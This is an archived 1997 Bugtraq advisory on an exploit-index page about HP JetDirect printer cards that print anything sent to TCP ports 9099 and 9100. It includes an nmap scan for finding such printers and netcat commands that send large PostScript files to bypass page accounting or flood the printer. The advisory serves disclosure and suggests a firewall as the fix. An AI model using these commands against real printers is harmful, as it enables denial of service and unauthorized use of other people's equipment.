JetDirect printer card problem

Summary
Description:The JetDirect card with TCP/IP enabled will by default open high ports (9099 and 9100) which can be used to print arbitrary files
Author:Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
Compromise:DoS Attack (send 500 page documents), or free printing if you have access to the printer in question
Vulnerable Systems:Those using JetDirect with TCP/IP enabled and the default unrestricted connections.
Date:4 October 1997
Notes:Cool! He used my
Details


Date: Sat, 4 Oct 1997 18:02:01 -0300
From: Klaus Steding-Jessen <jessen@AHAND.UNICAMP.BR>
To: BUGTRAQ@NETSPACE.ORG
Subject: HP Laserjet 4M Plus DirectJet Problem

        I don't  know if this is a  well known HP printer problem, but
I've found no references of it on the bugtraq archives.

        It is possible  to  bypass lpd and  page  accounting on a   HP
PostScript printer  attached  to an  ethernet card sending  PostScript
directly to tcp ports 9099 and 9100 from any machine over the network.

        I've tested on a HP Laserjet 4M  Plus DirectJet, connecting to
port 9099 or 9100 tcp and printing PostScript documents.

        There is no way to tell the printer to accept connections only
from a  range  of valid IPs.  Also,  it  is possible to  telnet to the
printer  and change  the printer IP  or disable  logging.  Protect the
printer inside a firewall appears to be the only safe way.

        Find this kind of printer  on a network is  quite easy with  a
good port scanner.  It  responds to ping and listens  on tcp ports 23,
515, 9099 and 9100.

# nmap -P -s printer.foo.bar.org -p 23,515,9099,9100

Starting nmap V 1.25 by Fyodor (fyodor@nmap.org, www.dhp.com/~fyodor/nmap/
Hint: The -v option notifies you of open ports as they are found.

Host printer.foo.bar.org (xx.yy.ww.zz) appears to be up ... good.
Open ports on printer.foo.bar.org (xx.yy.ww.zz):
Port Number  Protocol  Service
23           tcp        telnet
515          tcp        printer
9099         tcp        unknown
9100         tcp        unknown


        To print a  PostScript document just  send it to  port 9099 or
9100.  Netcat will do:

$ nc printer.foo.bar.org 9099 < huge_document.ps
        or
$ nc printer.foo.bar.org 9100 < huge_document.ps

        Anyone can confirm this with other printers?  I think HP 5M is
also vulnerable, but I've not tested.

Klaus.

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: